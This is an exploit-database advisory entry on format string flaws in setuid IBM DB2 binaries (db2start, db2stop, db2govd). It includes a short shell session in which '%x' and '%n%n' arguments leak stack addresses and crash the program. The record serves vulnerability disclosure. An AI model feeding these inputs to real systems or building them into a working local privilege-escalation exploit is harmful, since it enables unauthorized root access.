IBM DB2 - db2start Format String Arbitrary Code Execution

2003-11-07T00:00:00
ID EXPLOITPACK:88C9282D3F7DFA2D4F08D44DACB85324
Type exploitpack
Reporter SNOSoft
Modified 2003-11-07T00:00:00

Description

IBM DB2 - db2start Format String Arbitrary Code Execution

                                        
                                            source: https://www.securityfocus.com/bid/8989/info

Multiple command-line parameter format string vulnerabilities have been discovered in various IBM DB2 binaries. Specifically, format-based functions are implemented erroneously within the db2govd, db2start, and db2stop programs. These binaries are typically installed setuid. As a result, a malicious local user may be capable of gaining elevate privileges.

[kf@RiotStarter adm]$ ./db2start %x
SQL2032N The "bffff270" parameter is not valid.
[kf@RiotStarter adm]$ ./db2start %n%n
Segmentation fault
[kf@RiotStarter adm]$ ./db2stop %x
SQL2032N The "bffff6f0" parameter is not valid.